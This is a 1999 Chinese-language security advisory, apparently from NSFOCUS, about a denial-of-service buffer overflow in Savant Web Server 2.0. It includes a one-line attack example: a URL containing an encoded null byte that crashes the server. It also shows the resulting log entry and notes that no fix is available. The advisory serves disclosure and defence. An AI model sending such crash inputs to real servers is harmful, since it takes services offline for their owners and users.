安全研究
安全漏洞
Savant Web Server V2.0本地/远程拒绝服务漏洞
发布日期:1999-12-29
更新日期:1999-12-29
受影响系统:Savant Web Server V2.0 Win9X / NT / 2000
描述:
Savant服务器提供对目前流行的WEB特性和技术的支持。在服务器分析GET命令流程中的一个空字符(NULL)会导致本地/远程缓冲区溢出。
攻击实例:只要在Internet Explorer中,输入地址:http://SavantServerIP/%00/ 即可。
该拒绝服务攻击会被记录在 C:\Savant\Logs\general.txt 中,其内容如下:
Attacker Ip - - [28/Dec/1999:00:10:27 -0300] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.
htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279
建议:
暂无。
浏览次数:6633
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
